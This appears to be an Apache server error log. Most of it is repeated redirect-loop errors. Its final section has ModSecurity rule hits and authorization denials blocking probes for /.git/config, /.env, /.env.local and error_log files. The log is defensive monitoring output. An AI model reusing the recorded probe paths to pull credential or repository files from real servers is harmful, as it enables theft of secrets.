[Mon May 11 16:40:19.888244 2026] [core:error] [pid 1412074:tid 1412076] [client 4.193.137.131:11324] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:20.393903 2026] [core:error] [pid 1411201:tid 1411249] [client 4.193.137.131:11277] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:20.393942 2026] [core:error] [pid 1411201:tid 1411249] [client 4.193.137.131:11277] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:20.869294 2026] [core:error] [pid 1412074:tid 1412086] [client 4.193.137.131:11651] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:20.869326 2026] [core:error] [pid 1412074:tid 1412086] [client 4.193.137.131:11651] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:21.367677 2026] [core:error] [pid 1411055:tid 1411059] [client 4.193.137.131:12125] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:21.367819 2026] [core:error] [pid 1411055:tid 1411059] [client 4.193.137.131:12125] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:21.847689 2026] [core:error] [pid 1411201:tid 1411250] [client 4.193.137.131:11301] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:21.847725 2026] [core:error] [pid 1411201:tid 1411250] [client 4.193.137.131:11301] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:22.322176 2026] [core:error] [pid 1416109:tid 1416150] [client 4.193.137.131:11311] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:22.322213 2026] [core:error] [pid 1416109:tid 1416150] [client 4.193.137.131:11311] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:24.340465 2026] [core:error] [pid 1424905:tid 1424931] [client 4.193.137.131:11284] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:24.340502 2026] [core:error] [pid 1424905:tid 1424931] [client 4.193.137.131:11284] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:25.082073 2026] [core:error] [pid 1412074:tid 1412091] [client 4.193.137.131:11281] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:25.082113 2026] [core:error] [pid 1412074:tid 1412091] [client 4.193.137.131:11281] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:25.583367 2026] [core:error] [pid 1411201:tid 1411257] [client 4.193.137.131:11274] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:25.584489 2026] [core:error] [pid 1411201:tid 1411257] [client 4.193.137.131:11274] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:26.072727 2026] [core:error] [pid 1412074:tid 1412080] [client 4.193.137.131:12105] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:26.072764 2026] [core:error] [pid 1412074:tid 1412080] [client 4.193.137.131:12105] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:26.575449 2026] [core:error] [pid 1411099:tid 1411119] [client 4.193.137.131:11298] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:26.575486 2026] [core:error] [pid 1411099:tid 1411119] [client 4.193.137.131:11298] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:27.071431 2026] [core:error] [pid 1411055:tid 1411076] [client 4.193.137.131:11265] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:27.071469 2026] [core:error] [pid 1411055:tid 1411076] [client 4.193.137.131:11265] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:27.574826 2026] [core:error] [pid 1416109:tid 1416151] [client 4.193.137.131:11264] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:27.574873 2026] [core:error] [pid 1416109:tid 1416151] [client 4.193.137.131:11264] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:28.052678 2026] [core:error] [pid 1411099:tid 1411105] [client 4.193.137.131:12102] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:28.052717 2026] [core:error] [pid 1411099:tid 1411105] [client 4.193.137.131:12102] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:28.531593 2026] [core:error] [pid 1416109:tid 1416152] [client 4.193.137.131:11268] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:28.531627 2026] [core:error] [pid 1416109:tid 1416152] [client 4.193.137.131:11268] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:29.010431 2026] [core:error] [pid 1411055:tid 1411062] [client 4.193.137.131:11293] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:29.010467 2026] [core:error] [pid 1411055:tid 1411062] [client 4.193.137.131:11293] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:29.489774 2026] [core:error] [pid 1416109:tid 1416140] [client 4.193.137.131:11650] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:29.489809 2026] [core:error] [pid 1416109:tid 1416140] [client 4.193.137.131:11650] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:30.000166 2026] [core:error] [pid 1412074:tid 1412092] [client 4.193.137.131:11271] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:30.000198 2026] [core:error] [pid 1412074:tid 1412092] [client 4.193.137.131:11271] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:30.507590 2026] [core:error] [pid 1416109:tid 1416149] [client 4.193.137.131:11318] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:30.507714 2026] [core:error] [pid 1416109:tid 1416149] [client 4.193.137.131:11318] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:31.000676 2026] [core:error] [pid 1416109:tid 1416133] [client 4.193.137.131:11284] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:31.000715 2026] [core:error] [pid 1416109:tid 1416133] [client 4.193.137.131:11284] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:31.477417 2026] [core:error] [pid 1411055:tid 1411057] [client 4.193.137.131:11287] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:31.477452 2026] [core:error] [pid 1411055:tid 1411057] [client 4.193.137.131:11287] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:31.984526 2026] [core:error] [pid 1424905:tid 1424916] [client 4.193.137.131:11325] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:31.984560 2026] [core:error] [pid 1424905:tid 1424916] [client 4.193.137.131:11325] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:32.518305 2026] [core:error] [pid 1412074:tid 1412093] [client 4.193.137.131:11296] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:32.518340 2026] [core:error] [pid 1412074:tid 1412093] [client 4.193.137.131:11296] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:33.035419 2026] [core:error] [pid 1411201:tid 1411266] [client 4.193.137.131:11283] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:33.035454 2026] [core:error] [pid 1411201:tid 1411266] [client 4.193.137.131:11283] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:33.534983 2026] [core:error] [pid 1416109:tid 1416134] [client 4.193.137.131:11291] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:33.535018 2026] [core:error] [pid 1416109:tid 1416134] [client 4.193.137.131:11291] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:34.022376 2026] [core:error] [pid 1411201:tid 1411263] [client 4.193.137.131:11280] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:34.022406 2026] [core:error] [pid 1411201:tid 1411263] [client 4.193.137.131:11280] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:34.500674 2026] [core:error] [pid 1416109:tid 1416154] [client 4.193.137.131:11285] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:34.500708 2026] [core:error] [pid 1416109:tid 1416154] [client 4.193.137.131:11285] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:34.977063 2026] [core:error] [pid 1416109:tid 1416145] [client 4.193.137.131:11276] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:34.977096 2026] [core:error] [pid 1416109:tid 1416145] [client 4.193.137.131:11276] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:35.456749 2026] [core:error] [pid 1411099:tid 1411108] [client 4.193.137.131:11267] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:35.456784 2026] [core:error] [pid 1411099:tid 1411108] [client 4.193.137.131:11267] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:35.932840 2026] [core:error] [pid 1411201:tid 1411249] [client 4.193.137.131:11270] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:35.932878 2026] [core:error] [pid 1411201:tid 1411249] [client 4.193.137.131:11270] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:36.410192 2026] [core:error] [pid 1412074:tid 1412088] [client 4.193.137.131:11685] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:36.410217 2026] [core:error] [pid 1412074:tid 1412088] [client 4.193.137.131:11685] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:36.907043 2026] [core:error] [pid 1411099:tid 1411102] [client 4.193.137.131:12098] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:36.907183 2026] [core:error] [pid 1411099:tid 1411102] [client 4.193.137.131:12098] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:37.426908 2026] [core:error] [pid 1416109:tid 1416135] [client 4.193.137.131:11272] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:37.426948 2026] [core:error] [pid 1416109:tid 1416135] [client 4.193.137.131:11272] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:37.919138 2026] [core:error] [pid 1411201:tid 1411246] [client 4.193.137.131:11315] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:37.919185 2026] [core:error] [pid 1411201:tid 1411246] [client 4.193.137.131:11315] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:38.393381 2026] [core:error] [pid 1416109:tid 1416150] [client 4.193.137.131:11297] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:38.393414 2026] [core:error] [pid 1416109:tid 1416150] [client 4.193.137.131:11297] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:38.908266 2026] [core:error] [pid 1411055:tid 1411072] [client 4.193.137.131:11653] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:38.908300 2026] [core:error] [pid 1411055:tid 1411072] [client 4.193.137.131:11653] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:41.703125 2026] [security2:error] [pid 1411099:tid 1411118] [client 43.156.51.128:59094] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/"] [unique_id "agHqaQ-Qm4vhlWBPlMi_ZQAAABI"], referer: http://www.piregwan-genesis.com
[Mon May 11 16:40:57.659456 2026] [authz_core:error] [pid 1424905:tid 1424929] [client 194.163.167.152:52699] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/sitemaps/providers/error_log, referer: binance.com
[Mon May 11 16:41:00.392501 2026] [security2:error] [pid 1424905:tid 1424915] [client 123.207.65.62:52560] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agHqfIW8yzYoWG_eyCWdbAAAAUc"]
[Mon May 11 16:41:03.678601 2026] [authz_core:error] [pid 1412074:tid 1412095] [client 194.163.167.152:55520] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/sitemaps/providers/error_log, referer: binance.com
[Mon May 11 16:41:07.109301 2026] [security2:error] [pid 1411099:tid 1411115] [client 123.207.65.62:34332] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agHqgw-Qm4vhlWBPlMi_ggAAAA8"], referer: http://www.pole-de-mobilite-regional.com
[Mon May 11 16:41:11.394823 2026] [authz_core:error] [pid 1416109:tid 1416129] [client 194.163.167.152:52268] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/widgets/error_log, referer: binance.com
[Mon May 11 16:41:17.402269 2026] [authz_core:error] [pid 1411055:tid 1411069] [client 194.163.167.152:52148] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/widgets/error_log, referer: binance.com
[Mon May 11 16:41:23.904645 2026] [proxy_fcgi:error] [pid 1424905:tid 1424927] [client 104.238.222.26:53757] AH01071: Got error 'Primary script unknown'
[Mon May 11 16:41:25.702820 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHqlUWKUxpmnkK7zHyB-wAAAQo"]
[Mon May 11 16:41:25.703365 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHqlUWKUxpmnkK7zHyB-wAAAQo"]
[Mon May 11 16:41:25.703644 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHqlUWKUxpmnkK7zHyB-wAAAQo"]
[Mon May 11 16:41:26.052819 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHqlkWKUxpmnkK7zHyB_QAAAQo"]
[Mon May 11 16:41:26.053332 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHqlkWKUxpmnkK7zHyB_QAAAQo"]
[Mon May 11 16:41:26.053579 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHqlkWKUxpmnkK7zHyB_QAAAQo"]
[Mon May 11 16:41:26.235213 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHqlkWKUxpmnkK7zHyB_wAAAQo"]
[Mon May 11 16:41:26.235708 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHqlkWKUxpmnkK7zHyB_wAAAQo"]
[Mon May 11 16:41:26.235956 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHqlkWKUxpmnkK7zHyB_wAAAQo"]
